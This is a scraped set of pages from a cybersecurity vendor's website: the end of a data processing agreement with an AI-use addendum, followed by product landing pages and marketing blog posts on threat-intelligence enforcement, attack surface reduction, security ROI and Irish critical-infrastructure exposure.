termination of the MSA; provided that Centripetal may retain such Personal Information on backup media as long as such media is periodically erased or overwritten, and such retained Personal Information shall remain subject to the DPA for as long as Centripetal retains it. If Customer terminates or ceases to use any individual Product while the MSA remains in effect, then upon Customer’s written request Centripetal will, within sixty (60) days after the later of such termination or the request, delete Personal Information that Centripetal Processes solely for that Product and that is not required for any Product that remains in effect. This obligation is subject to the same backup-media retention allowance stated in this Section and to any retention required by applicable law or legal hold, and is in addition to, and does not limit, Centripetal’s return-or-destruction obligations under this Section on expiration or termination of the MSA.Addendum A - AI AddendumTo the extent Centripetal AI or Third-Party AI are used for Customer Use or Centripetal Use, Centripetal shall comply with the following:1. CENTRIPETAL AI FOR CENTRIPETAL USETo the extent Centripetal utilizes Centripetal AI for Centripetal Use, Centripetal will comply with AI Use Principles (“AUP”) 1 through 10 set forth in Section 5 of this AI Addendum.2. THIRD-PARTY AI FOR CENTRIPETAL USETo the extent Centripetal utilizes Third-Party AI for Centripetal Use, Centripetal will comply with the AUPs 1 through 12 set forth in Section 5 of this AI Addendum.3. CENTRIPETAL AI FOR CUSTOMER USETo the extent Centripetal offers Centripetal AI for Customer Use, Centripetal will comply with AUP 1, 6, 8, 9 and 10 set forth in Section 5 of this AI Addendum.4. THIRD-PARTY AI FOR CUSTOMER USETo the extent Centripetal offers Third-Party AI for Customer Use, Centripetal will comply with AUPs 1, 6, 8, 9, 11 and 12 set forth in Section 5 of this AI Addendum.5. AI USE PRINCIPLES (AUPS)AUP 1. Compliance with Laws. Centripetal will ensure that its development, use and deployment of AI complies with all applicable laws and regulations, including Data Protection Laws.AUP 2. AI Acceptable Use Policy. Centripetal will maintain a policy that describes how Centripetal implements and uses AI for Centripetal Use, the purposes and uses for which Centripetal permits AI to be used, the Centripetal employees permitted to use AI, and the mechanisms that Centripetal has implemented to address the risks posed by the use of AI (“AI Acceptable Use Policy”).AUP 3. Oversight, Fairness, and Non-Discrimination. Centripetal will maintain human oversight over the inputs, use and outputs of AI in connection with Centripetal Use, and will implement internal governance processes to ensure the ethical, fair, and responsible use of AI. Centripetal will monitor and mitigate any risk of algorithmic bias, discrimination, and other adverse outcomes, and will promptly notify Customer if it becomes aware of any issue that could materially affect the fairness, reliability, or safety of the Products.AUP 4. Attribution. Centripetal will identify any Deliverable, work-product, and output substantially generated using AI.AUP 5. Awareness and Training. Centripetal will train all personnel that use AI for Centripetal Use or who are involved in the development of AI for Customer Use. Such training will include, at a minimum, the following: (i) purposes, capabilities, and limitations of such AI; (ii) risks related to bias, discrimination, and data misuse; (iii) applicable Data Protection Laws; (iv) monitoring, escalation, and human oversight; (v) reporting AI-related incidents, malfunctions, and complaints; and (vi) the AI Acceptable Use Policy. Centripetal will refresh such training periodically and as necessary in response to any substantive change to the AI Acceptable Use Policy or Centripetal’s use of such AI.AUP 6. AI Impact Assessment. Centripetal will conduct not less than annually an AI impact assessment that will include, at a minimum, the following with respect to Centripetal Use: (i) actual and foreseeable use cases for AI, with an explanation of how such use is limited to activities necessary to fulfill legitimate business purposes; (ii) inventory of Centripetal personnel authorized to use or access such AI, ensuring that access is restricted to only those individuals whose roles require such use; (iii) evaluation of outcomes yielded by AI to ensure accuracy, reliability, and legitimacy; (iv) evaluation of any known or foreseeable risk of harm to individuals or businesses, including risks related to discrimination, misinformation, or violations of privacy; (v) description of steps taken to mitigate such risks, including safeguards such as monitoring, auditing, and human oversight; (vi) description of technical, administrative, and organizational controls implemented to safeguard information Processed using AI; (vii) summary of any material complaint, incident, or adverse outcome related to the use of AI, along with any corrective or remedial measure; and (viii) written report documenting the AI Impact Assessment, including findings and recommendations. Upon Customer’s request, Centripetal will provide Customer with a non-privileged summary of its most recent AI Impact Assessment.AUP 7. Notice and Transparency. Upon Customer’s request, Centripetal will provide Customer with a description of any Centripetal Use, including: (i) the AI being used; (ii) the purposes for such Centripetal Use; and (iii) any known limitation, constraint, or risk that is reasonably likely to materially affect the accuracy, fairness, or reliability of the Products.AUP 8. Confidentiality. Centripetal will not Process any Confidential Information or Personal Information through Centripetal AI or Third-Party AI, unless specifically authorized in writing by Customer; provided that Customer may choose to Process such information for Customer Use. If Customer consents or chooses to Process such information through Centripetal AI or Third-Party AI, Centripetal will ensure that any such information is Processed only to the extent necessary for the purpose of providing Services to Customer under the Agreement. Notwithstanding the foregoing, Centripetal may Process Deidentified Data, Usage Data and Threat Intelligence Data through Centripetal AI or Third-Party AI, in each case to the extent such data does not contain Personal Information.AUP 9. Model Training. Centripetal will ensure that any Confidential Information or Personal Information Processed through Centripetal AI or Third-Party AI is not used to train, retrain, or otherwise improve the performance or functionality of Centripetal AI or Third-Party AI, unless expressly authorized in writing by Customer. Notwithstanding the foregoing, Centripetal may use Deidentified Data, Usage Data and Threat Intelligence Data for model training, in each case to the extent such data does not contain Personal Information.AUP 10. Termination Obligations for Centripetal AI. Upon termination or expiration of the MSA, Centripetal will ensure that all Confidential Information and Personal Information is not stored or retained within Centripetal AI.AUP 11. Termination Obligations for Third-Party. Upon termination or expiration of the MSA, Centripetal will use commercially reasonable efforts, to the extent within its reasonable control, to ensure that any Confidential Information and Personal Information that was Processed through Third-Party AI is no longer retained, stored, or accessible by such Third-Party AI provider, including by taking reasonable steps to cause such data to be deleted from the provider’s systems, and will, upon Customer’s request, provide such confirmation of deletion as Centripetal is reasonably able to obtain from the provider.AUP 12. Appropriate Agreements. Centripetal will use commercially reasonable efforts to ensure that each Third-Party AI provider is contractually bound by terms consistent with those imposed on Centripetal under the DPA and this AI Addendum, to the extent such terms are reasonably obtainable from the provider. --- ### [Unlock the Power of Real-Time Threat Intelligence](https://www.centripetal.ai/unlock-the-power-of-realtime-threat-intelligence) Published: 2025-08-12 About CentripetalCentripetal is a cybersecurity leader and three-time Deloitte Fast 500 and Fintech Innovations Lab winner. We’re operationalizing cyber threat intelligence by harnessing the global intelligence community to protect every business from all known and zero-day attacks in near real-time. --- ### [Still Using ThreatARMOR®?](https://www.centripetal.ai/threat-armor) Published: 2025-08-12 The Migration Is Easy:Discovery & planningSeamless deploymentManaged solution, not a do-it-yourself implementationGo-live with dashboards and full expert support --- ### [New York State SECURE Grant Program](https://www.centripetal.ai/ny-secure-grant) Published: 2026-04-02 New York State SECURE Grant ProgramFunding for CybersecurityThe New York State SECURE grant program provides funding and no-cost technical assistance to help local governments strengthen the cybersecurity of their drinking water and wastewater systems. Centripetal is here to help you understand your options and get what you need to apply. Application Resources See how CleanINTERNET®—the 24/7 proactive threat prevention solution—can protect your business, your customers, and your reputation. --- ### [Legal](https://www.centripetal.ai/legal-home) Published: 2026-08-26 See how CleanINTERNET®—the 24/7 proactive threat prevention solution—can protect your business, your customers, and your reputation. --- ## Blog ### [Cybersecurity is Getting Faster at the Wrong Thing](https://www.centripetal.ai/blog/cybersecurity-is-getting-faster-at-the-wrong-thing) Published: 2026-09-14 Summary: AI promises faster detection, richer analysis and quicker response. But if the attacker is already inside your network, is any of that truly proactive? Reaction remains cybersecurity’s default posture. Rather than question that approach, the industry has focused on making it faster. The instinct is understandable. Cybersecurity has always been about understanding threats. What has changed is their sheer scale, and the growing gap between what organisations can see and what they can realistically act on. Somewhere along the way, we started calling faster detection, richer analysis and AI-powered response proactive security. But there’s an important distinction: if you’re detecting an attacker after they’ve entered your network, you’re not being proactive. You’re responding to something that has already happened. AI has turned up the volume The uncomfortable truth is that most cyber threats aren’t particularly new or exotic. Networks are still networks. Protocols are still protocols. And the majority of vulnerabilities attackers continue to exploit are already known. What has changed is the speed and scale at which attackers can operate. That’s where AI comes in. In most cases, AI isn’t fundamentally changing how cyber attacks work. It’s accelerating and scaling them. Researching vulnerabilities, developing exploits, conducting reconnaissance and launching attacks were all possible before AI. The difference is that tasks that once took weeks or months can now happen in days — or even hours. The throttle has simply been opened. That acceleration can look like greater sophistication, but often, it’s really just greater volume. A vulnerability in a popular application can be discovered in the morning, turned into an exploit and deployed at scale before the day is over. For defenders, that creates a problem we’re all familiar with: noise. Security teams are drowning in alerts, logs and signals. The problem isn’t necessarily that the information is wrong. It’s that there’s too much of it. And when everything is treated as important, the thing that actually matters can easily get lost. Detection isn’t the same as prevention AI-powered detection and automated response have obvious benefits. They can help analysts work faster, spot patterns and prioritise incidents. But they have a fundamental limitation: they are still reacting to activity that has already reached the environment. If your AI system is watching malicious behaviour happening inside your network, the attacker has already crossed the threshold. At that point, the job is damage limitation. This isn’t an argument against detection and response. Both remain essential. But they shouldn’t be the first opportunity to act. The earlier a known threat can be stopped, the less pressure falls on every control, and every person, downstream. This distinction matters more as we become increasingly comfortable handing decisions over to AI. Security remediation isn’t always as simple as find vulnerability, apply patch, problem solved. Take healthcare for example. Many critical systems still depend on legacy infrastructure that, from a textbook security perspective, shouldn’t exist. But those systems may also be supporting essential clinical services. So what should an AI prioritise: removing the vulnerability, or keeping the system running safely for patients? The same challenge exists in energy, transport and industrial environments, where changing a digital system can have very real physical consequences. A technically correct security decision can still create an operational or safety problem. That’s where experience matters. AI can process enormous amounts of information, but processing information isn’t the same as understanding the consequences of acting on it. The answer then isn’t to automate every security decision. It’s to reduce how many urgent decisions need to be made in the first place.Intelligence should help us actThis is why we need to rethink what we mean by threat intelligence. Intelligence isn’t valuable simply because we have more of it. It’s valuable when it helps us make better decisions and reduce risk. A single threat feed, on its own, only provides part of the picture. Different sources overlap, disagree and vary in relevance depending on the organisation and sector. The real value comes from bringing those signals together, putting them into context and then doing something useful with them. That might mean identifying hostile infrastructure before it reaches your network, blocking reconnaissance traffic or suppressing malicious activity upstream. The goal isn’t to fix every vulnerability immediately. That simply isn’t realistic. The goal is to make those vulnerabilities harder for attackers to exploit, while giving your security team something increasingly valuable: time. Time to understand what actually matters. Time to prioritise remediation properly. And time to make decisions without an attacker already sitting inside your environment. The future is prevention-first We’re increasingly seeing two different approaches emerge in cybersecurity. One focuses on using AI to discover vulnerabilities faster, analyse more data and respond more quickly. The other starts from a different premise: vulnerabilities will exist, so the priority should be preventing attackers from reaching them in the first place. But it’s the second approach that deserves far more attention. Speed is useful. AI is incredibly useful. But speed without control isn’t security. Finding a vulnerability faster doesn’t necessarily stop a breach, an outage or disruption. True proactive threat intelligence powered security is actually pretty quiet. And when it works, nothing happens. The attack is stopped upstream. The background noise drops. Analysts can focus on the signals that genuinely matter rather than fighting a constant stream of alerts. That’s the outcome we should be aiming for. AI absolutely has a role to play. It can process information at a scale humans simply cannot. It can identify patterns and make good security teams even better. But it shouldn’t be confused with human judgement. The future of cybersecurity isn’t reactive, and it isn’t about handing everything over to machines. It’s preventative, human-guided and accountable. AI should amplify human expertise, not replace it. --- ### [What Happens When You Start Shrinking the Attack Surface](https://www.centripetal.ai/blog/what-happens-when-you-start-shrinking-the-attack-surface) Published: 2026-03-02 Summary: As attack surfaces expand beyond the perimeter, visibility alone isn’t enough. Learn how enforcing intelligence in real time can measurably shrink exposure and prevent breaches before they begin. In April 2025, a logistics firm suffered a breach that followed a pattern security teams are seeing with increasing frequency—one that began with a single forgotten API. It wasn’t a zero-day exploit, or a sophisticated nation-state intrusion. It was an exposed development endpoint—one that had quietly been left online long after its purpose was served. Within minutes of discovery, an attacker gained access, pivoted across internal systems, and began extracting data from the company’s cloud environment.It’s a small story in technical terms—one API, one oversight—but it reveals something far larger about the state of cybersecurity today. The attack surface of modern organizations has expanded beyond anything legacy systems were designed to handle. What used to be a perimeter defined by firewalls and gateways has become an ecosystem of connections that never stop changing. Every new application, every integration, every mobile device or third-party vendor adds another potential point of compromise. The result is an environment that feels unbounded—a surface so large and dynamic that defenders often don’t even know where it begins or ends.Yet despite that complexity, one truth remains constant: the attack surface is not a force of nature. It’s something we create, and therefore, something we can reduce. Shrinking it isn’t an abstract ideal—it’s an achievable, measurable discipline. And increasingly, it depends not on seeing more—but on enforcing what intelligence already knows.The Expanding EdgeOrganizations today operate across a staggering range of interconnected environments. The shift to hybrid work and mobile-first operations has delivered flexibility, productivity, and innovation—but it has also multiplied the number of systems that must be defended. A single employee might now access sensitive applications from a laptop on a home Wi-Fi network, a tablet in transit, and a smartphone connected through public 5G. Each device represents a node on the network, and each connection extends the perimeter just a little farther.According to IBM’s Cost of a Data Breach 2025, 82% of breaches now involve data stored in the cloud, and 40% originate from unmanaged or third-party systems. In parallel, a 2024 TacitRed survey found that 90% of organizations reported an increase in impactful external attack surface incidents— not just because attackers became more sophisticated, but because exposure expanded faster than defenses could keep up.The pattern is clear: as the modern business becomes more distributed, its security exposure grows exponentially.The factors driving that growth are as varied as the organizations affected by it. Shadow IT continues to proliferate as teams adopt SaaS tools faster than security teams can vet them. APIs, the connective tissue of digital transformation, are often deployed with inconsistent controls and limited visibility. Cloud workloads spin up and down at a pace that makes static security policy management nearly impossible. And while most enterprises have adopted endpoint protection, gaps remain across non-traditional devices—macOS, iOS, Android, even IoT hardware that quietly sits unmonitored.This mosaic of systems has given rise to what security professionals increasingly call an unbounded surface: a collection of touchpoints that constantly expand and contract, but never fully come into view. The challenge isn’t simply scale—it’s that most of this surface is governed by infrastructure that cannot apply intelligence fast enough to matter.When Visibility Becomes NoiseThe instinctive response to a growing attack surface has been to add more visibility—more data, more sensors, more feeds. The assumption is logical: the more you see, the safer you’ll be. But in practice, it’s led to a new kind of overload.Modern security operations centers ingest terabytes of telemetry daily, correlating logs and alerts from endpoint protection, network monitoring, and threat intelligence systems. Yet more data rarely translates to more clarity. In MITRE Engenuity’s 2024 ATT&CK Evaluations survey analysis, a majority of analysts reported alert overload as a primary factor limiting effective response, citing lack of time and contextual clarity.This is the paradox of modern cybersecurity: defenders have never had more information, yet breaches continue to rise.The issue isn’t blindness—it’s latency. Intelligence exists, but it arrives too late, or sits too far downstream, to stop the initial interaction. By the time an alert fires, a connection has already been made. A packet has already crossed the boundary. The attack surface has already been engaged. Every second of latency between detection and response is an opportunity for attackers to advance. Every false positive drains attention from what matters. And every redundant or incomplete threat feed adds noise to an already deafening signal.Traditional architectures compound the issue. Firewalls, VPNs, and static rule sets remain critical layers, but they operate on assumptions that no longer hold true—that traffic flows in predictable directions, that the “inside” is trusted, and that controls can be updated manually as new threats appear. In reality, attack vectors change in minutes, and defenses built for human-paced updates simply can’t match machine-paced attacks.The result is a persistent imbalance: attackers operate in real time, defenders in delayed reaction.Rethinking the GoalThe goal is not faster detection. The goal is fewer opportunities for attackers to engage at all. Shrinking the attack surface means reducing the number of valid paths an attacker can use to reach your environment—and doing so before traffic is allowed to interact with internal systems. That requires a fundamental shift in where intelligence is applied.Instead of asking how quickly threats can be detected, the more relevant question becomes: why known malicious infrastructure is allowed to connect in the first place. Most threats aren’t zero-days. They’re already identified, cataloged, and circulating across global intelligence communities. The failure isn’t awareness—it’s enforcement.In this model, prevention is not theoretical and it’s not reactive. Known hostile IPs, domains, and command-and-control infrastructure are blocked at the edge, in real time, based on continuously updated intelligence. Unused APIs and dormant services are removed from exposure entirely. Outbound connections are restricted to trusted destinations, eliminating exfiltration paths before they can be abused.This is what shrinking the attack surface actually looks like: fewer doors, fewer interactions, and fewer chances for intelligence to arrive too late.From Intelligence to ActionThreat intelligence is often treated as a feed—a set of data points pulled into a SIEM or dashboard. But in reality, intelligence is only as valuable as the speed and precision with which it can be applied.Centripetal’s approach is built around that idea. We aggregate and normalize over 10 billion real-time indicators of compromise, collected from thousands of trusted providers across the globe, updated in near real-time. That intelligence is applied directly at the network edge—where packets arrive and decisions must be made. Our patented technology can execute over one sextillion decisions per second, inspecting and enforcing traffic in real time, before it ever reaches the network.The advantage of this model isn’t just scale; it’s immediacy. Instead of waiting for alerts to surface or logs to be analyzed, malicious activity is stopped the instant it’s identified. The noise disappears, and the attack surface shrinks by design.Yet automation alone isn’t enough. Precision requires human expertise. Our intelligence analysts and research teams continually validate, tune, and refine rule sets to ensure accuracy. False positives are minimized, policies stay aligned with business operations, and new intelligence is integrated within minutes—not days or weeks. The combination of machine speed and human skill produces a defense that adapts as quickly as the threat landscape itself.When intelligence isn’t just consumed but operationalized, it transforms from data into defense.Making Attack Surface Reduction RealFor many organizations, the idea of “shrinking the attack surface” sounds like a monumental task. It isn’t. It’s incremental, methodical, and achievable. The process starts with visibility—not the kind that floods dashboards, but the kind that clarifies priorities.According to Skyhawk Security’s 2024 Attack Surface Management Benchmark Report, 73% of organizations conducting formal surface discovery identified high-risk assets they were previously unaware of.From there, reduction becomes a continuous cycle. Remove unnecessary services and endpoints. Strengthen identity controls to limit who can access what. Segment networks so that compromise in one area cannot spread to another. Apply intelligence-enforced blocking to cut off known bad actors before they interact with your systems. Every small change reduces the pathways available to an attacker. Over time, those small changes compound into measurable resilience.In this model, success is visible and quantifiable. A smaller attack surface means fewer inbound connection attempts, fewer false positives, and fewer incidents. SOC analysts spend less time triaging and more time improving your organization’s strategy. Security becomes proactive, not reactive—and the sense of constant crisis begins to fade.What Results Look LikeWhen enterprises implement proactive enforcement and attack surface reduction strategies, the results are both tangible and cultural. Security teams consistently see meaningful reductions in exploitable exposure once known malicious infrastructure is blocked before it can interact with internal systems. Alert volume drops not because threats disappear, but because unnecessary interactions never occur.As the surface shrinks, policy management becomes simpler and system behavior more predictable. Fewer external touchpoints mean fewer unexpected pathways for attackers—and fewer downstream events for security teams to triage. Over time, this stability begins to reshape broader risk conversations, influencing how insurers, auditors, and compliance teams evaluate an organization’s security posture across frameworks such as PCI, SOX, HIPAA, and GDPR.But the most meaningful outcome is operational confidence. Security teams move from reacting to incidents to controlling exposure. The work becomes strategic, not frantic.This is the quiet success of surface reduction: fewer interactions, less noise, and far fewer moments where failure is even possible.The Future of ReductionThe attack surface will continue to expand as AI, autonomous systems, and edge computing deepen connectivity. Complexity will increase. But reduction doesn’t fight complexity—it contains it.The organizations that succeed won’t be the ones with the most dashboards. They’ll be the ones that apply intelligence at the moment of interaction, eliminating risk before it manifests.The lesson for leaders is that shrinking the surface isn’t about limiting innovation; it’s about sustaining it safely. It allows organizations to move faster, deploy more confidently, and embrace new technologies without inheriting exponential risk. In a world where every digital initiative expands exposure, reduction becomes the counterbalance—a way to ensure progress doesn’t come at the cost of protection.Always Watching, Always WorkingAt Centripetal, we believe that proactive cybersecurity should feel seamless—like a force operating quietly in the background, always watching and always working. By combining global threat intelligence, AI-driven enforcement, and human expertise, we help organizations turn complexity into control.Our mission isn’t just to detect threats. It’s to stop them before they reach you, to transform security from a reactive cost into a proactive advantage, and to make peace of mind a measurable outcome.The attack surface will never disappear. But it can be reduced—measurably, continuously, and decisively. And when defenses operate at the speed of intelligence, silence isn’t ignorance. It’s confidence.See how real-time intelligence enforcement reduces exposure, cuts noise, and turns prevention into a measurable outcome. --- ### [The Real ROI Problem: Intelligence That Isn’t Enforced](https://www.centripetal.ai/blog/reframing-cybersecurity-for-the-board) Published: 2026-02-27 Summary: Stop reporting threats. Start reporting value. See how operationalized threat intelligence and Business Value Assessments turn cybersecurity into a fundable board-level strategy. Today, most security reporting is trapped in a defensive cycle: detect a threat, react to it, report how serious it was. Rinse and repeat.The problem? Executive fatigue.Boards and leadership teams are tired of hearing about noise. They don’t want another dashboard of inbound attacks. They want to understand how cybersecurity protects revenue, sustains operations, and strengthens governance.It’s time to stop reporting on threats—and start reporting on business continuity.Moving the Conversation to Business OutcomesTo communicate effectively at the executive level, security leaders need a Business Value Assessment (BVA). Centripetal creates BVAs to demonstrate how its operationalized threat intelligence delivers value beyond the security team.A BVA is not:A product overviewA feature comparisonA technical deep diveIt is:A strategic frameworkA method to align cybersecurity investment with continuity of serviceA multi-year roadmap tied to governance and institutional outcomesBecause if it can’t be defended in the boardroom, it won’t be funded.Why Traditional Security Reporting Fails the BoardTo understand why BVAs are necessary, we first need to examine why most existing cybersecurity investments fail to show ROI at the executive level. Most organizations rely on Indicators of Compromise (IOCs) reactively—after an attack has bypassed defenses.But there are fundamental challenges:Threat feeds cover only a small fraction of known IOCsThere is little overlap between providersQuality varies widelyTraditional firewalls cannot scale to enforce massive intelligence setsOn average, customers purchase IOC feeds worth more than $150,000 per month from multiple providers. Yet traditional hardware firewalls can typically support only 10,000 to 150,000 active rules before performance degrades—causing CPU spikes, latency, or dropped packets.As a result, security teams are forced to “curate” intelligence—blocking perhaps 1% of known threats. In 2026, this model is simply inadequate.The Real ROI Problem: Intelligence That Isn’t EnforcedThis is what boards today don't see. Organizations are paying for intelligence they cannot apply, cannot effective measure, and cannot show proof of ROI.Security teams are left explaining:Why attacks still got throughWhy costs continue to riseWhy outcomes stay the sameFear-based reporting fills these gaps, but it doesn’t build confidence or justify investment.Scaling Intelligence to Modern Threat VolumeCentripetal addresses this challenge with its AI-powered CleanINTERNET technology, designed to ingest and enforce billions of IOCs simultaneously without latency.Rather than picking and choosing which intelligence to enforce, it applies the full global body of threat intelligence to every packet in real time.To put this into perspective:A firewall’s IOC capacity, if stacked like paper, would be about 38 feet high.CleanINTERNET’s capacity would exceed 426 miles high.That difference allows ingestion of hundreds of global CTI feeds—compared to the typical 3 to 15 feeds supported by most next-generation firewalls.For a board member, the message is simple:We take the most meaningful threat intelligence for your organization and stop threats before they reach your firewall—and before they even enter your network.The Financial Impact: Real Numbers from the FieldWhen intelligence is enforced at scale, value becomes measurable.Consider a BVA Centripetal conducted for a large property management firm.Over five years, proactive threat shielding reduced risk exposure by $5–7 million.That included:$500,000 to $2 million per year in ransomware downtime avoidance$200,000+ annually saved through SIEM consolidationOver $1 million per year in avoided spend on additional products and servicesWe’ve seen SIEM logs shrink from 50GB per day to 11MB per day—dramatically reducing storage and analysis costs by eliminating noise before it enters the network.This is cost avoidance driven by measurable operational impact.Shielding the Team: Reducing Alert FatigueFinancial metrics are only half the story. Operational health matters just as much.By filtering hostile traffic upstream, organizations reduce alert fatigue by over 95%.At a global law firm, alert volume dropped from 60 per day to just 3 alerts every 90 days—a 99.94% reduction in noise.Instead of clearing false positives, analysts focus on proactive threat hunting and strategic initiatives.This is what “shielding the team” looks like.Infrastructure Health and Hardware LongevityThere’s also a direct hardware benefit.At a technology services company, deploying CleanINTERNET in front of the firewall reduced firewall CPU utilization from 20% to 3%.That means:Extended hardware lifeDelayed capital expendituresNo “rip and replace” driven by traffic growthIt also adds protection against zero-day firewall exploits by enforcing threat intelligence at the network perimeter.Higher Education: Protecting Instructional ContinuityIn some industries, the business outcome is mission continuity. For a higher education institution, the mission wasn’t just cybersecurity—it was sustaining instruction.Results included:99% reduction in perimeter scans95% shielding rate against phishing and hostile webpagesReduction of 50+ exposed Shodan-identified objects to zeroMost importantly, they achieved this without hiring additional analysts. Centripetal provides embedded threat analyst support aligned to organizational goals—a significant labor cost avoidance in today’s talent market.The Most Important Skill for the CISO: TranslationBoards don’t care that you blocked millions of bots hitting your network.They care that:You recovered 85 hours of team productivity this monthYou reduced the external attack surface by 99%You strengthened resilience without increasing headcountTranslation connects the “what” (technical metrics) to the “why” (business continuity and institutional stability).How to Get Started with a Business Value AssessmentThe path forward is structured and data-driven:Step 1: Executive DiscoveryIdentify what leadership truly values—budget stability, service continuity, and compliance alignment.Step 2: ValidationRun a no-cost, 30-day Proof of Value with Centripetal to gather real-world data.Step 3: DeliveryPresent a multi-year strategy grounded in actual measured savings—IOC value, protection coverage, cost avoidance, and governance alignment.No theoretical projections, just real numbers from your own environment.Cybersecurity as a Business PartnershipCybersecurity can no longer be positioned as a tool purchase.It must be framed as a strategic business partnership—delivering measurable value to executives, operators, finance leaders, and compliance stakeholders alike.Centripetal's CleanINTERNET enables organizations to stop chasing alerts—and start advancing IT services.And that is a conversation the board is ready to fund. --- ### [Galway, the Ecosystem of Intelligence](https://www.centripetal.ai/blog/galway-the-ecosystem-of-intelligence) Published: 2026-01-28 Summary: Centripetal’s journey in Galway is rooted in more than location—it’s about an ecosystem of intelligence where technology, creativity, and human connection intersect. I am often asked why Centripetal chose Galway as our European home? The answer is instinctive yet intertwined at the same time. Life started for Centripetal three years ago in Unit 11B, at Platform94 in Mervue (Galway Technology Centre at the time). The vision was clear – establish, build and create a team of passionate cybersecurity and intelligence professionals to help Irish and European customers protect their greatest assets – their information and data. There have been many bumps and bruises along the journey so far but the passion, energy and enthusiasm of the team has never faltered. Which brings us back to the question, why Galway?The instinctive answer leads towards the fundamentals of what Galway can offer – access to Ireland, UK and the European market whilst maintaining close connectivity to the US East Coast; availability of a mix of graduates and experienced technology savvy talent with multinational and cultural experiences; a strong research and innovation culture which inspires experimentation and progress; and an amazing quality of life. There is a longer and more entwined answer to why Centripetal chose Galway. For us, it was the “Ecosystem of Intelligence.”A unique combination offered by the Galway region which creates a catalyst for innovation, creativity and growth. An ecosystem that seamlessly combines:Technical Intelligence, a world class technology and med-tech cluster which consistently fosters ingenuity and growth.Academic intelligence, globally recognized centers of learning. This includes the University of Galway and the Atlantic Technology University, creating a platform for research and insight in addition to enthusiastic and passionate graduates.Creative intelligence, the arts and crafts are what make Galway special. A culture of creativity that energizes and encourages the expansion of thought and creates an inclusivity of all communities.Emotional intelligence, the ability to connect. The uniqueness of the people to craft and tell stories and connect through shared emotive experiences.Ecosystems will always exist. In a world where intelligence is increasingly defined as artificial, it is more and more important to recognize the importance of human energy and intelligence and the intertwined output that creates.And, for that, Galway is unique. Learn more about Centripetal --- ### [When Time-to-Exploit Goes Negative: Rethinking Defense for Irish Critical Infrastructure](https://www.centripetal.ai/blog/rethinking-defense-for-irish-critical-infrastructure) Published: 2025-10-13 Summary: Nearly half of Ireland’s critical infrastructure has exposed known vulnerabilities—and 85% of those are already being exploited. With time-to-exploit now negative, reactive defense is no longer… The Numbers Don't Lie—And They're AlarmingWhen we analyzed Ireland's critical national infrastructure (CNI) through an intelligence lens, the findings were sobering. Of 222 CNI organizations examined, 98—nearly 44%—have exposed known vulnerabilities. We then analyzed whether these open doors were being actively exploited by threat actors. Ireland is home to 15,776 attack origins, and 85% of them are the very same IPs and networks in CNI organizations with those exposed known vulnerabilities. These aren't theoretical weaknesses but evidence of actual and significant breaches.Ireland's Digital Attack Surface: A Target-Rich Environment (September 2025)Data analyzed in September 2025 shows the scope of Ireland's exposure:349,946 exposed IPs and networks (3.62% of total infrastructure)509,378 instances of known vulnerabilities6,336 unique CVEs affecting systems nationwide14,235 affected IP addresses and networksThis isn't distributed evenly. Critical sectors bear disproportionate risk:Government Infrastructure:37 exposed private services13 exposed conduits10 obsolete services214 unmitigated CVEsEducation Sector:383 exposed private services34 exposed conduits111 obsolete services1,442 unmitigated CVEsDublin has high concentrations of vulnerabilities across the education, energy, transportation, telecom, and hosting sectors, which is expected given its large population. However, despite Dublin accounting for the largest share, significant vulnerabilities are still widely distributed throughout the rest of Ireland.Threat Velocity Is AcceleratingVulnerability exposure is not only rising, but threat actors are exploiting these weaknesses at a much faster rate. This is reflected in a 35% increase in attack origins in Ireland—from 11,701 in 2024 to 15,776 in 2025.Threat Intelligence Has the AnswerData about the vulnerabilities found in Irish Critical Infrastructure is gleaned from threat intelligence. In the last two years, the sophistication and scale of global threat intelligence has exploded:400 threat intelligence producers feeding data streams5,000 distinct threat actor groups tracked globally6,000 malware families in active circulation888 billion threat contexts analyzed in just the first half of 2025Intelligence production has reached unprecedented scale. In 2023, we tracked 1,624 feed sources. By the end of 2025, that number will reach 3,512. More critically, producers are moving to real-time delivery—meaning the window between threat emergence and exploitation is collapsing.Time-to-Exploit Is Now NegativeGoogle reports that the time-to-exploit dropped to –1 day in 2024, meaning vulnerabilities are being targeted before public disclosure. Centripetal’s 2024 CVE analysis further shows two exploitation waves—around 40 days before disclosure and again about 10 days prior—based on retroactive timelines of infrastructure and TTPs. Together, these findings show that exposed vulnerabilities are being breached rapidly and efficiently by threat actors. In this environment, reactive security isn't just inadequate—it's obsolete.What Attackers Are DoingThe data shows that 85% of IPs and networks with known vulnerabilities are already breached by threat actors and being exploited to launch attacks. An analysis of attack vectors originating in Ireland reveals where adversaries are focusing their efforts:63.37% Reconnaissance — Mapping networks, identifying targets, gathering intelligence10.52% Command and Control — Establishing persistent access9.32% Other Risks — Emerging and uncategorized threats7.63% Botnet Activity — Distributed attack infrastructure6.5% Defense Evasion — Techniques to avoid detectionThis distribution tells a story: attackers are patient, methodical, and focused on persistence. They're not smashing through the front door—they're mapping every window, testing every lock, and waiting for the right moment.How Threat Actors Have EvolvedModern threat actors are fundamentally different from their predecessors:Mission-driven: They have clear objectives and sophisticated strategiesOrganized and modernized: Criminal enterprises are well-organized and can operate in a corporate-like structureImpact-focused: Targeting critical infrastructure for maximum disruptionGreater subtlety: Designed for undetected persistence, not noisy disruptionOpportunistic at scale: Using AI and automation to detect and exploit gaps faster than humans can patch themThis isn't the work of lone hackers in basements. These are well-funded, highly capable adversaries operating with near-military precision.The Strategic Choice: Reactive or Proactive?Ireland's critical infrastructure stands at a crossroads. The question isn't whether another major incident will occur—it's whether organizations will be ready when it does.The Calm Before the Storm—Reactive: Wait for alerts. Respond to incidents. Patch known vulnerabilities after exploitation. Accept that threats will reach your network and hope your detection catches them before significant damage occurs.Staying Ahead of the Storm—Proactive: Prevent threats before they enter your network. Leverage real-time threat intelligence at scale. Block known bad actors automatically while expert analysts hunt the sophisticated threats. Reduce your attack surface before adversaries can map it.The Path Forward: Intelligence-Powered PreventionThe data is clear: reactive security cannot keep pace with the current threat landscape. When 44% of critical infrastructure has known vulnerabilities, when attack originators increase 35% year-over-year, and when time-to-exploit is negative, detection alone isn't enough.Ireland's CNI organizations, and all organizations dealing with the relentless pace of today’s threats, can opt for intelligence-powered prevention that:Operates at scale: Processing billions of threat indicators in real timeActs automatically: Blocking known threats before they touch the networkAdapts continuously: Learning from threat actor behavior as it evolvesProvides expert backup: Human intelligence analyzing the sophisticated threats that evade automationData Science and AI: The EqualizerThreat actors are beginning to use AI to scale their operations. Defenders must do the same. Predictive intelligence powered by data science can identify emerging threats, map attack patterns, and forecast adversary behavior before campaigns fully materialize.This isn't science fiction. The technology exists. And, the threat intelligence exists. The question is whether organizations will deploy it 